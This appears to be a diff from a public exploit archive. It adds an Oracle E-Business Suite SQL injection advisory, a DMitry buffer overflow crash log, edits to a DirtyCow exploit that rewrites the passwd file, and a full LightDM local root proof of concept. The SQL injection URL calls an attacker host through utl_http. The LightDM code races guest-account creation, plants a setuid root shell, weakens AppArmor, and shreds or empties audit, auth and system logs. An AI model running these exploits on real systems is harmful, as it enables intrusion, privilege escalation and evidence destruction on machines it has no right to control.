        'Client' => ";#{payload.encoded};",
        'Download' => 'Download'
      }
    )
  end
 end
--- a/platforms/jsp/webapps/41926.txt
+++ b/platforms/jsp/webapps/41926.txt
@ -0,0 +1,186 @@
 Application: Oracle E-Business Suite
 Versions Affected: Oracle EBS 12.2.3
 Vendor URL: http://oracle.com
 Bug: SQL injection
 Reported: 23.12.2016
 Vendor response: 24.12.2016
 Date of Public Advisory: 18.04.2017
 Reference: Oracle CPU April 2017
 Author: Dmitry Chastuhin (ERPScan)
 Description
 1. ADVISORY INFORMATION
 Title:[ERPSCAN-17-021] SQL Injection in E-Business Suite IESFOOTPRINT
 Advisory ID: [ERPSCAN-17-021]
 Risk: high
 CVE: CVE-2017-3549
 Advisory URL: https://erpscan.com/advisories/erpscan-17-021-sql-injection-e-business-suite-iesfootprint/
 Date published: 18.04.2017
 Vendors contacted: Oracle
 2. VULNERABILITY INFORMATION
 Class: SQL injection
 Impact: read sensitive data, modify data from database
 Remotely Exploitable: yes
 Locally Exploitable: no
 CVSS Information
 CVSS Base Score v3:    8.0 / 10
 CVSS Base Vector:
 AV : Attack Vector (Related exploit range) Network (N)
 AC : Attack Complexity (Required attack complexity) High (H)
 PR : Privileges Required (Level of privileges needed to exploit) High (H)
 UI : User Interaction (Required user participation) None (N)
 S : Scope (Change in scope due to impact caused to components beyond
 the vulnerable component) Changed (C)
 C : Impact to Confidentiality High (H)
 I : Impact to Integrity High (H)
 A : Impact to Availability High (H)
 3. VULNERABILITY DESCRIPTION
 The code comprises an SQL statement containing strings that can be
 altered by an attacker. The manipulated SQL statement can be used then
 to retrieve additional data from the database or to modify the data
 without authorization.
 4. VULNERABLE PACKAGES
 Oracle EBS 12.2.3
 5. SOLUTIONS AND WORKAROUNDS
 To correct this vulnerability, implement Oracle CPU April 2017
 6. AUTHOR
 Dmitry Chastuhin
 7. TECHNICAL DESCRIPTION
 PoC
 vulnerable jsp name is  iesfootprint.jsp
 deployDate = ((request.getParameter("deployDate")) != null) ?
 request.getParameter("deployDate") : "";
  responseDate = ((request.getParameter("responseDate")) != null) ?
 request.getParameter("responseDate") : "";
  dscriptName = ((request.getParameter("dscript_name")) != null) ?
 request.getParameter("dscript_name") : "";
  dscriptId = ((request.getParameter("dscriptId")) != null) ?
 request.getParameter("dscriptId") : "";
 %>
 <%
 // Process the data based on params
 if (showGraph) {
   // Create Query String
   StringBuffer query = new StringBuffer("SELECT panel_name,
 count_panels, avg_time, min_time, max_time, ");
   query.append("\'").append(_prompts[10]).append("\'");
   query.append(" Average_Time FROM (SELECT rownum, panel_name,
 count_panels, avg_time, min_time, max_time FROM (SELECT Panel_name,
 count(panel_name) count_panels,
 (sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000
 min_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE
 dscript_id = ");
   query.append(dscriptId);
   query.append(" AND start_time between ");
   query.append("\'").append(deployDate).append("\'");
   query.append(" and ");
   query.append("\'").append(responseDate).append("\'");
   query.append(" GROUP BY panel_name ORDER BY avg_time desc)) WHERE
 rownum < 11");
   // Get XMLDocument for the corresponding query and Paint graph
   try {
       XMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString());
       htmlString =XMLServ.getXMLTransform(xmlDoc,htmlURL);
 Approximate request with SQL injection
 http://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11'
 AND utl_http.request('http://attackers_host/lalal')='1' GROUP BY
 panel_name)) --
 8. ABOUT ERPScan Research
 ERPScan research team specializes in vulnerability research and
 analysis of critical enterprise applications. It was acknowledged
 multiple times by the largest software vendors like SAP, Oracle,
 Microsoft, IBM, VMware, HP for discovering more than 400
 vulnerabilities in their solutions (200 of them just in SAP!).
 ERPScan researchers are proud of discovering new types of
 vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
 Best Server-Side Bug" nomination at BlackHat 2013.
 ERPScan experts participated as speakers, presenters, and trainers at
 60+ prime international security conferences in 25+ countries across
 the continents ( e.g. BlackHat, RSA, HITB) and conducted private
 trainings for several Fortune 2000 companies.
 ERPScan researchers carry out the EAS-SEC project that is focused on
 enterprise application security awareness by issuing annual SAP
 security researches.
 ERPScan experts were interviewed in specialized info-sec resources and
 featured in major media worldwide. Among them there are Reuters,
 Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
 Chinabyte, etc.
 Our team consists of highly-qualified researchers, specialized in
 various fields of cybersecurity (from web application to ICS/SCADA
 systems), gathering their experience to conduct the best SAP security
 research.
 9. ABOUT ERPScan
 ERPScan is the most respected and credible Business Application
 Cybersecurity provider. Founded in 2010, the company operates globally
 and enables large Oil and Gas, Financial, Retail and other
 organizations to secure their mission-critical processes. Named as an
 ‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP
 Solution providers” and distinguished by 30+ other awards, ERPScan is
 the leading SAP SE partner in discovering and resolving security
 vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
 assist in improving the security of their latest solutions.
 ERPScan’s primary mission is to close the gap between technical and
 business security, and provide solutions for CISO's to evaluate and
 secure SAP and Oracle ERP systems and business-critical applications
 from both cyberattacks and internal fraud. As a rule, our clients are
 large enterprises, Fortune 2000 companies and MSPs, whose requirements
 are to actively monitor and manage security of vast SAP and Oracle
 landscapes on a global scale.
 We ‘follow the sun’ and have two hubs, located in Palo Alto and
 Amsterdam, to provide threat intelligence services, continuous support
 and to operate local offices and partner network spanning 20+
 countries around the globe.
 Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
 Phone: 650.798.5255
 Twitter: @erpscan
 Scoop-it: Business Application Security
--- a/platforms/lin_x86-64/shellcode/41439.c
+++ b/platforms/lin_x86-64/shellcode/41439.c
--- a/platforms/lin_x86-64/shellcode/41477.c
+++ b/platforms/lin_x86-64/shellcode/41477.c
--- a/platforms/linux/dos/41898.txt
+++ b/platforms/linux/dos/41898.txt
@ -0,0 +1,107 @@
 ################
 #Exploit Title: Dmitry(Deepmagic Information Gathering Tool) Local Stack Buffer Overflow
 #CVE: CVE-2017-7938
 #CWE: CWE-119
 #Exploit Author: Hosein Askari (FarazPajohan)
 #Vendor HomePage: http://mor-pah.net/software/dmitry-deepmagic-information-gathering-tool/
 #Version : 1.3a (Unix)
 #Exploit Tested on: Parrot OS
 #Date: 19-04-2017
 #Category: Application
 #Author Mail : hosein.askari@aol.com
 #Description: Buffer overflow in DMitry (Deepmagic Information Gathering Tool) version 1.3a (Unix) allows attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a long argument. An example threat model is automated execution of DMitry with hostname strings found in local log files.
 ###############################
 #valgrind dmitry $(python -c 'print "A"*64')
 ==11312== Memcheck, a memory error detector
 ==11312== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
 ==11312== Using Valgrind-3.12.0 and LibVEX; rerun with -h for copyright info
 ==11312== Command: dmitry AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 ==11312== 
 Deepmagic Information Gathering Tool
 "There be some deep magic going on"
 ERROR: Unable to locate Host IP addr. for AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Continuing with limited modules
 HostIP:
 HostName:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Gathered Inic-whois information for AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 ---------------------------------
 Error: Unable to connect - Invalid Host
 ERROR: Connection to InicWhois Server AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA failed
 Gathered Netcraft information for AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 ---------------------------------
 Retrieving Netcraft.com information for AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Netcraft.com Information gathered
 **11312** *** strcpy_chk: buffer overflow detected ***: program terminated
 ==11312==    at 0x4030DD7: VALGRIND_PRINTF_BACKTRACE (valgrind.h:6818)
 ==11312==    by 0x40353AA: __strcpy_chk (vg_replace_strmem.c:1439)
 ==11312==    by 0x804B5F7: ??? (in /usr/bin/dmitry)
 ==11312==    by 0x8048ED8: ??? (in /usr/bin/dmitry)
 ==11312==    by 0x407D275: (below main) (libc-start.c:291)
 ==11312== 
 ==11312== HEAP SUMMARY:
 ==11312==     in use at exit: 0 bytes in 0 blocks
 ==11312==   total heap usage: 82 allocs, 82 frees, 238,896 bytes allocated
 ==11312== 
 ==11312== All heap blocks were freed -- no leaks are possible
 ==11312== 
 ==11312== For counts of detected and suppressed errors, rerun with: -v
 ==11312== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)
 ======================================
 GDB output:
 (gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Starting program: /usr/bin/dmitry AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Deepmagic Information Gathering Tool
 "There be some deep magic going on"
 ERROR: Unable to locate Host IP addr. for AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Continuing with limited modules
 *** buffer overflow detected ***: /usr/bin/dmitry terminated
 ======= Backtrace: =========
 /lib/i386-linux-gnu/libc.so.6(+0x6737a)[0xb7e5a37a]
 /lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x37)[0xb7eeae17]
 /lib/i386-linux-gnu/libc.so.6(+0xf60b8)[0xb7ee90b8]
 /lib/i386-linux-gnu/libc.so.6(+0xf56af)[0xb7ee86af]
 /usr/bin/dmitry[0x8048e04]
 /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7e0b276]
 /usr/bin/dmitry[0x80490a4]
 ======= Memory map: ========
 08048000-0804f000 r-xp 00000000 08:01 7209647    /usr/bin/dmitry
 0804f000-08050000 r--p 00006000 08:01 7209647    /usr/bin/dmitry
 08050000-08051000 rw-p 00007000 08:01 7209647    /usr/bin/dmitry
 08051000-08073000 rw-p 00000000 00:00 0          [heap]
 b7d9f000-b7dbb000 r-xp 00000000 08:01 24248323   /lib/i386-linux-gnu/libgcc_s.so.1
 b7dbb000-b7dbc000 r--p 0001b000 08:01 24248323   /lib/i386-linux-gnu/libgcc_s.so.1
 b7dbc000-b7dbd000 rw-p 0001c000 08:01 24248323   /lib/i386-linux-gnu/libgcc_s.so.1
 b7dbd000-b7dd1000 r-xp 00000000 08:01 24249970   /lib/i386-linux-gnu/libresolv-2.24.so
 b7dd1000-b7dd2000 r--p 00013000 08:01 24249970   /lib/i386-linux-gnu/libresolv-2.24.so
 b7dd2000-b7dd3000 rw-p 00014000 08:01 24249970   /lib/i386-linux-gnu/libresolv-2.24.so
 b7dd3000-b7dd5000 rw-p 00000000 00:00 0 
 b7dd5000-b7dda000 r-xp 00000000 08:01 24249963   /lib/i386-linux-gnu/libnss_dns-2.24.so
 b7dda000-b7ddb000 r--p 00004000 08:01 24249963   /lib/i386-linux-gnu/libnss_dns-2.24.so
 b7ddb000-b7ddc000 rw-p 00005000 08:01 24249963   /lib/i386-linux-gnu/libnss_dns-2.24.so
 b7ddc000-b7dde000 r-xp 00000000 08:01 24249725   /lib/i386-linux-gnu/libnss_mdns4_minimal.so.2
 b7dde000-b7ddf000 r--p 00001000 08:01 24249725   /lib/i386-linux-gnu/libnss_mdns4_minimal.so.2
 b7ddf000-b7de0000 rw-p 00002000 08:01 24249725   /lib/i386-linux-gnu/libnss_mdns4_minimal.so.2
 b7de0000-b7deb000 r-xp 00000000 08:01 24249964   /lib/i386-linux-gnu/libnss_files-2.24.so
 b7deb000-b7dec000 r--p 0000a000 08:01 24249964   /lib/i386-linux-gnu/libnss_files-2.24.so
 b7dec000-b7ded000 rw-p 0000b000 08:01 24249964   /lib/i386-linux-gnu/libnss_files-2.24.so
 b7ded000-b7df3000 rw-p 00000000 00:00 0 
 b7df3000-b7fa4000 r-xp 00000000 08:01 24249955   /lib/i386-linux-gnu/libc-2.24.so
 b7fa4000-b7fa6000 r--p 001b0000 08:01 24249955   /lib/i386-linux-gnu/libc-2.24.so
 b7fa6000-b7fa7000 rw-p 001b2000 08:01 24249955   /lib/i386-linux-gnu/libc-2.24.so
 b7fa7000-b7faa000 rw-p 00000000 00:00 0 
 b7fd4000-b7fd7000 rw-p 00000000 00:00 0 
 b7fd7000-b7fd9000 r--p 00000000 00:00 0          [vvar]
 b7fd9000-b7fdb000 r-xp 00000000 00:00 0          [vdso]
 b7fdb000-b7ffd000 r-xp 00000000 08:01 24249741   /lib/i386-linux-gnu/ld-2.24.so
 b7ffd000-b7ffe000 rw-p 00000000 00:00 0 
 b7ffe000-b7fff000 r--p 00022000 08:01 24249741   /lib/i386-linux-gnu/ld-2.24.so
 b7fff000-b8000000 rw-p 00023000 08:01 24249741   /lib/i386-linux-gnu/ld-2.24.so
 bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]
 Program received signal SIGABRT, Aborted.
 0xb7fd9cf9 in __kernel_vsyscall ()
--- a/platforms/linux/local/40839.c
+++ b/platforms/linux/local/40839.c
@ -1,4 +1,3 @@
 // EDB-Note: After getting a shell, doing "echo 0 > /proc/sys/vm/dirty_writeback_centisecs" may make the system more stable.
 //
 // This exploit uses the pokemon exploit of the dirtycow vulnerability
 // as a base and automatically generates a new passwd line.
@ -185,10 +184,10 @@ int main(int argc, char *argv[])
    pthread_join(pth,NULL);
  }
-  printf("Done! Check %s to see if the new user was created\n", filename);
+  printf("Done! Check %s to see if the new user was created.\n", filename);
-  printf("You can log in with username %s and password %s.\n\n",
+  printf("You can log in with the username '%s' and the password '%s'.\n\n",
    user.username, plaintext_pw);
-  printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n",
+    printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
-    filename, backup_filename);
+    backup_filename, filename);
  return 0;
-}
+}
--- a/platforms/linux/local/41923.txt
+++ b/platforms/linux/local/41923.txt
@ -0,0 +1,456 @@
 Source: https://blogs.securiteam.com/index.php/archives/3134
 Vulnerability Summary
 The following advisory describes a local privilege escalation via LightDM
 found in Ubuntu versions 16.10 / 16.04 LTS.
 Ubuntu is an open source software platform that runs everywhere from IoT
 devices, the smartphone, the tablet and the PC to the server and the
 cloud. LightDM is an X display manager that aims to be lightweight, fast,
 extensible and multi-desktop. It uses various front-ends to draw login
 interfaces, also called Greeters.
 Credit
 An independent security researcher, G. Geshev (@munmap), has reported this
 vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
 Vendor Responses
 The vendor has released a patch to address this issue.
 For more information: https://www.ubuntu.com/usn/usn-3255-1/
 CVE Details
 CVE-2017-7358 <https://nvd.nist.gov/vuln/detail/CVE-2017-7358>
 Vulnerability Details
 The vulnerability is found in *LightDM*, which is the Ubuntu’s default
 desktop manager, more specifically in the guest login feature. By default
 *LightDM* allows you to log into a session as a temporary user. This is
 implemented in a script called ‘*guest-account*‘.
@ubuntu:~$ ls -l /usr/sbin/guest-account
 -rwxr-xr-x 1 root root 6516 Sep 29 18:56 /usr/sbin/guest-account
@ubuntu:~$ dpkg -S /usr/sbin/guest-account
 lightdm: /usr/sbin/guest-account
@ubuntu:~$ dpkg -s lightdm
 Package: lightdm
 Status: install ok installed
 Priority: optional
 Section: x11
 Installed-Size: 672
 Maintainer: Robert Ancell <robert.ancell@ubuntu.com>
 Architecture: amd64
 Version: 1.19.5-0ubuntu1
 Provides: x-display-manager
 Depends: debconf (>= 0.5) | debconf-2.0, libc6 (>= 2.14), libgcrypt20 (>=
 1.7.0), libglib2.0-0 (>= 2.39.4), libpam0g (>= 0.99.7.1), libxcb1, libxdmcp6
 , adduser, bash (>= 4.3), dbus, libglib2.0-bin, libpam-runtime (>= 0.76-14),
 libpam-modules, plymouth (>= 0.8.8-0ubuntu18)
 Pre-Depends: dpkg (>= 1.15.7.2)
 Recommends: xserver-xorg, unity-greeter | lightdm-greeter | lightdm-kde-
 greeter
 Suggests: bindfs
 Conflicts: liblightdm-gobject-0-0, liblightdm-qt-0-0
 Conffiles:
 /etc/apparmor.d/abstractions/lightdm a715707411c3cb670a68a4ad738077bf
 /etc/apparmor.d/abstractions/lightdm_chromium-browser
 e1195e34922a67fa219b8b95eaf9c305
 /etc/apparmor.d/lightdm-guest-session 3c7812f49f27e733ad9b5d413c4d14cb
 /etc/dbus-1/system.d/org.freedesktop.DisplayManager.conf
 b76b6b45d7f7ff533c51d7fc02be32f4
 /etc/init.d/lightdm be2b1b20bec52a04c1a877477864e188
 /etc/init/lightdm.conf 07304e5b3265b4fb82a2c94beb9b577e
 /etc/lightdm/users.conf 1de1a7e321b98e5d472aa818893a2a3e
 /etc/logrotate.d/lightdm b6068c54606c0499db9a39a05df76ce9
 /etc/pam.d/lightdm 1abe2be7a999b42517c82511d9e9ba22
 /etc/pam.d/lightdm-autologin 28dd060554d1103ff847866658431ecf
 /etc/pam.d/lightdm-greeter 65ed119ce8f4079f6388b09ad9d8b2f9
 Description: Display Manager
 LightDM is a X display manager that:
  * Has a lightweight codebase
  * Is standards compliant (PAM, ConsoleKit, etc)
  * Has a well defined interface between the server and user interface
  * Cross-desktop (greeters can be written in any toolkit)
 Homepage: https://launchpad.net/lightdm
@ubuntu:~$
 The script runs as root when you view the login screen, also known as a
 greeter, to log in as a guest. Ubuntu’s default greeter is Unity Greeter.
 *Vulnerable code*
 The vulnerable function is ‘*add_account*‘.
 35   temp_home=$(mktemp -td guest-XXXXXX)
 36   GUEST_HOME=$(echo ${temp_home} | tr '[:upper:]' '[:lower:]')
 37   GUEST_USER=${GUEST_HOME#/tmp/}
 38   [ ${GUEST_HOME} != ${temp_home} ] && mv ${temp_home} ${GUEST_HOME}
 The guest folder gets created using ‘mktemp’ on line 35. The attacker can
 use ‘*inotify*‘ to monitor ‘*/tmp*‘ for the creation of this folder.
 The folder name will likely contain both upper and lower case letters. Once
 this folder is created, we grab the folder name and quickly and create the
 equivalent folder with all letters lower case.
 If we manage to race the ‘*mv*‘ command on line 38, we end up with the
 newly created home for the guest user inside the folder we own.
 Once we have the guest home under our control, we rename it and replace it
 with a *symbolic link* to a folder we want to take over. The code below
 will then add the new user to the OS. The user’s home folder will already
 point to the folder we want to take over, for example ‘*/usr/local/sbin*‘.
 68    useradd --system --home-dir ${GUEST_HOME} --comment $(gettext "Guest")
 --user-group --shell /bin/bash ${GUEST_USER} || {
 69      rm -rf ${GUEST_HOME}
 70      exit 1
 71    }
 The attacker can grab the newly created user’s ID and monitor ‘
 */usr/local/sbin*‘ for ownership changes. The ownership will be changed by
 the following ‘*mount*‘.
 78  mount -t tmpfs -o mode=700,uid=${GUEST_USER} none ${GUEST_HOME} || {
 79    rm -rf ${GUEST_HOME}
 80    exit 1
 81  }
 We will remove the symbolic link and create a folder with the same name –
 to let the guest user to log in. While the guest is logging in, his path
 for finding executable files will include ‘*bin*‘ under his home folder.
 That’s why we create a new symbolic link to point his ‘*bin*‘ into a folder
 we control. This way we can force the user to execute our own code under
 his user ID. We use this to log out the guest user from his session which
 is where we can gain root access.
 The logout code will first execute the following code:
 156  PWENT=$(getent passwd ${GUEST_USER}) || {
 157    echo "Error: invalid user ${GUEST_USER}"
 158    exit 1
 159  }
 This code will be executed as the owner of the script, i.e. root. Since we
 have already taken over ‘*/usr/local/sbin*‘ and have planted our own ‘
 *getent*‘, we get to execute commands as root at this point.
 Note – We can trigger the guest session creation script by entering the
 following two commands.
 XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool lock
 XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool
 switch-to-guest
 Proof of Concept
 The Proof of Concept is contains 9 files and they will take advantage of
 the race conditions mentioned above.
   1. kodek/bin/cat
   2. kodek/shell.c
   3. kodek/clean.sh
   4. kodek/run.sh
   5. kodek/stage1.sh
   6. kodek/stage1local.sh
   7. kodek/stage2.sh
   8. kodek/boclocal.c
   9. kodek/boc.c
 By running the following scripts an attacker can run root commands:
@ubuntu:/var/tmp/kodek$ ./stage1local.sh
@ubuntu:/var/tmp/kodek$
 [!] GAME OVER !!!
 [!] count1: 2337 count2: 7278
 [!] w8 1 minute and run /bin/subash
@ubuntu:/var/tmp/kodek$ /bin/subash
 root@ubuntu:~# id
 uid=0(root) gid=0(root) groups=0(root)
 root@ubuntu:~#
 If the exploit fails, you can simply run it again.
 Once you get your root shell, you can optionally clean any exploit files
 and logs by executing the below.
 root@ubuntu:/var/tmp/kodek# ./clean.sh
 /usr/bin/shred: /var/log/audit/audit.log: failed to open for writing: No such
 file or directory
 Do you want to remove exploit (y/n)?
 y
 /usr/bin/shred: /var/tmp/kodek/bin: failed to open for writing: Is a
 directory
 root@ubuntu:/var/tmp/kodek#
 boc.c
 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <string.h>
 #include <ctype.h>
 #include <sys/inotify.h>
 #include <sys/stat.h>
 #include <pwd.h>
 #define EVENT_SIZE(sizeof(struct inotify_event))
 #define EVENT_BUF_LEN(1024 * (EVENT_SIZE + 16))
 int main(void) {
  struct stat info;
  struct passwd * pw;
  struct inotify_event * event;
  pw = getpwnam("root");
  if (pw == NULL) exit(0);
  char newpath[20] = "old.";
  int length = 0, i, fd, wd, count1 = 0, count2 = 0;
  int a, b;
  char buffer[EVENT_BUF_LEN];
  fd = inotify_init();
  if (fd < 0) exit(0);
  wd = inotify_add_watch(fd, "/tmp/", IN_CREATE | IN_MOVED_FROM);
  if (wd < 0) exit(0);
  chdir("/tmp/");
  while (1) {
    length = read(fd, buffer, EVENT_BUF_LEN);
    if (length > 0) {
      event = (struct inotify_event * ) buffer;
      if (event - > len) {
        if (strstr(event - > name, "guest-") != NULL) {
          for (i = 0; event - > name[i] != '\0'; i++) {
            event - > name[i] = tolower(event - > name[i]);
          }
          if (event - > mask & IN_CREATE) mkdir(event - > name, ACCESSPERMS)
 ;
          if (event - > mask & IN_MOVED_FROM) {
            rename(event - > name, strncat(newpath, event - > name, 15));
            symlink("/usr/local/sbin/", event - > name);
            while (1) {
              count1 = count1 + 1;
              pw = getpwnam(event - > name);
              if (pw != NULL) break;
            }
            while (1) {
              count2 = count2 + 1;
              stat("/usr/local/sbin/", & info);
              if (info.st_uid == pw - > pw_uid) {
                a = unlink(event - > name);
                b = mkdir(event - > name, ACCESSPERMS);
                if (a == 0 && b == 0) {
                  printf("\n[!] GAME OVER !!!\n[!] count1: %i count2: %i\n",
 count1, count2);
                } else {
                  printf("\n[!] a: %i b: %i\n[!] exploit failed !!!\n", a, b
 );
                }
                system("/bin/rm -rf /tmp/old.*");
                inotify_rm_watch(fd, wd);
                close(fd);
                exit(0);
              }
            }
          }
        }
      }
    }
  }
 }
 boclocal.c
 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <string.h>
 #include <ctype.h>
 #include <sys/inotify.h>
 #include <sys/stat.h>
 #include <pwd.h>
 #define EVENT_SIZE(sizeof(struct inotify_event))
 #define EVENT_BUF_LEN(1024 * (EVENT_SIZE + 16))
 int main(void) {
  struct stat info;
  struct passwd * pw;
  struct inotify_event * event;
  pw = getpwnam("root");
  if (pw == NULL) exit(0);
  char newpath[20] = "old.";
  int length = 0, i, fd, wd, count1 = 0, count2 = 0;
  int a, b, c;
  char buffer[EVENT_BUF_LEN];
  fd = inotify_init();
  if (fd < 0) exit(0);
  wd = inotify_add_watch(fd, "/tmp/", IN_CREATE | IN_MOVED_FROM);
  if (wd < 0) exit(0);
  chdir("/tmp/");
  while (1) {
    length = read(fd, buffer, EVENT_BUF_LEN);
    if (length > 0) {
      event = (struct inotify_event * ) buffer;
      if (event - > len) {
        if (strstr(event - > name, "guest-") != NULL) {
          for (i = 0; event - > name[i] != '\0'; i++) {
            event - > name[i] = tolower(event - > name[i]);
          }
          if (event - > mask & IN_CREATE) mkdir(event - > name, ACCESSPERMS)
 ;
          if (event - > mask & IN_MOVED_FROM) {
            rename(event - > name, strncat(newpath, event - > name, 15));
            symlink("/usr/local/sbin/", event - > name);
            while (1) {
              count1 = count1 + 1;
              pw = getpwnam(event - > name);
              if (pw != NULL) break;
            }
            while (1) {
              count2 = count2 + 1;
              stat("/usr/local/sbin/", & info);
              if (info.st_uid == pw - > pw_uid) {
                a = unlink(event - > name);
                b = mkdir(event - > name, ACCESSPERMS);
                c = symlink("/var/tmp/kodek/bin/", strncat(event - > name,
 "/bin", 5));
                if (a == 0 && b == 0 && c == 0) {
                  printf("\n[!] GAME OVER !!!\n[!] count1: %i count2:
 %i\n[!] w8 1 minute and run /bin/subash\n", count1, count2);
                } else {
                  printf("\n[!] a: %i b: %i c: %i\n[!] exploit failed
 !!!\n[!] w8 1 minute and run it again\n", a, b, c);
                }
                system("/bin/rm -rf /tmp/old.*");
                inotify_rm_watch(fd, wd);
                close(fd);
                exit(0);
              }
            }
          }
        }
      }
    }
  }
 }
 clean.sh
 #!/bin/bash
 if [ "$(/usr/bin/id -u)" != "0" ]; then
   echo "This script must be run as root" 1>&2
   exit 1
 fi
 /bin/rm -rf /tmp/guest-* /tmp/old.guest-*
 /usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc /var/log/kern
 .log /var/log/audit/audit.log /var/log/lightdm/*
 /bin/echo > /var/log/auth.log
 /bin/echo > /var/log/syslog
 /bin/dmesg -c >/dev/null 2>&1
 /bin/echo "Do you want to remove exploit (y/n)?"
 read answer
 if [ "$answer" == "y" ]; then
 /usr/bin/shred -fu /var/tmp/kodek/* /var/tmp/kodek/bin/*
 /bin/rm -rf /var/tmp/kodek
 else
 exit
 fi
 run.sh
 #!/bin/sh
 /bin/cat << EOF > /usr/local/sbin/getent
 #!/bin/bash
 /bin/cp /var/tmp/shell /bin/subash >/dev/null 2>&1
 /bin/chmod 4111 /bin/subash >/dev/null 2>&1
 COUNTER=0
 while [ \$COUNTER -lt 10 ]; do
 /bin/umount -lf /usr/local/sbin/ >/dev/null 2>&1
 let COUNTER=COUNTER+1
 done
 /bin/sed -i 's/\/usr\/lib\/lightdm\/lightdm-guest-session
 {/\/usr\/lib\/lightdm\/lightdm-guest-session flags=(complain) {/g' /etc/
 apparmor.d/lightdm-guest-session >/dev/null 2>&1
 /sbin/apparmor_parser -r /etc/apparmor.d/lightdm-guest-session >/dev/null 2>
 &1
 /usr/bin/getent passwd "\$2"
 EOF
 /bin/chmod 755 /usr/local/sbin/getent >/dev/null 2>&1
 shell.c
 #define _GNU_SOURCE
 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <grp.h>
 int main(void)
 {
    setresuid(0, 0, 0);
    setresgid(0, 0, 0);
    setgroups(0, NULL);
    putenv("HISTFILE=/dev/null");
    execl("/bin/bash", "[bioset]", "-pi", NULL);
    return 0;
 }
 stage1.sh
 #!/bin/bash
 if [ "${PWD}" == "/var/tmp/kodek" ]; then
 /usr/bin/killall -9 /var/tmp/boc >/dev/null 2>&1
 /usr/bin/killall -9 boc >/dev/null 2>&1
 /bin/sleep 3s
 /usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc >/dev/null 2>
 &1
 /usr/bin/gcc boc.c -Wall -s -o /var/tmp/boc
 /usr/bin/gcc shell.c -Wall -s -o /var/tmp/shell
 /bin/cp /var/tmp/kodek/run.sh /var/tmp/run.sh
 /var/tmp/boc
 else
 echo "[!] run me from /var/tmp/kodek"
 exit
 fi
 stage1local.sh
 #!/bin/bash
 if [ "${PWD}" == "/var/tmp/kodek" ]; then
 /usr/bin/killall -9 /var/tmp/boc >/dev/null 2>&1
 /usr/bin/killall -9 boc >/dev/null 2>&1
 /bin/sleep 3s
 /usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc >/dev/null 2>
 &1
 /usr/bin/gcc boclocal.c -Wall -s -o /var/tmp/boc
 /usr/bin/gcc shell.c -Wall -s -o /var/tmp/shell
 /bin/cp /var/tmp/kodek/run.sh /var/tmp/run.sh
 /var/tmp/boc &
 /bin/sleep 5s
 XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool lock
 XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool
 switch-to-guest
 else
 echo "[!] run me from /var/tmp/kodek"
 exit
 fi
 stage2.sh
 #!/bin/sh
 /usr/bin/systemd-run --user /var/tmp/run.sh
 /bin/cat
 #!/bin/sh
 /usr/bin/systemd-run --user /var/tmp/run.sh
